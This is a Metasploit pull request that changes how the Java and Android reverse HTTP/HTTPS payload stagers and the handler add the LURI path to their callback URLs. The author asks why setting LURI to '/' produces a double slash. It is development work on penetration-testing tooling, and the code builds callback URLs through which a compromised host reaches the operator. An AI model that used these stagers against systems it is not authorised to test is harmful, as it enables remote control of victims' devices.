### PR TITLE
java/android https LURI tweaks

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -304,7 +304,7 @@ protected
         resp.body = pkt.to_r
 
       when :init_python
-        print_status("#{cli.peerhost}:#{cli.peerport} #{uuid.to_s}) Staging Python payload ...")
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Python payload ...")
 
         url = payload_uri(req) + conn_id + '/'
 
@@ -334,7 +334,8 @@ protected
         })
 
       when :init_java
-        print_status("#{cli.peerhost}:#{cli.peerport} #{uuid.to_s}) Staging Java payload ...")
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...")
+
         url = payload_uri(req) + conn_id + "/\x00"
 
         blob = obj.generate_stage(

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -36,7 +36,7 @@ module Metasploit3
       uri_req_len = 5
     end
 
-    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}/"
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -36,7 +36,7 @@ module Metasploit3
       uri_req_len = 5
     end
 
-    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -53,8 +53,8 @@ module Metasploit3
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "#{luri}/"
-    c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    c << "#{luri}"
+    c << generate_uri_checksum(:init_java, uri_req_len)
     c << "\n"
 
     c

--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -57,6 +57,7 @@ module Metasploit3
     c << "Spawn=#{spawn}\n"
     c << "URL=https://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    c << "#{luri}"
     c << generate_uri_uuid_mode(:init_java, uri_req_len)
     c << "\n"
 


### PR DESCRIPTION
Hi @psychomario 
I did some testing on java/android *only*.
Everything seems to work but I'm a bit confused about:
set LURI /
The resulting url has a double slash, e.g:
https://192.168.1.90:4444//qngIHDTEgmCG4oXx0EySOgnuqrcDXgDLjSCKqr0Syk7zw6Ce9kLR8rX3MXumCx05DrettKv6vXyUl_E6KZEW0GCoQI96T8RxkaM5OpbPIkwgHCNlKHCPHeXlAKd5a486Uv9orwEv2C8-ZPOghTevlzTHzTXKkO6_t1BhnM9
Which gives a java.io.FileNotFoundException. What's the expected behaviour? What's the difference between ```set LURI /``` and ```unset LURI```?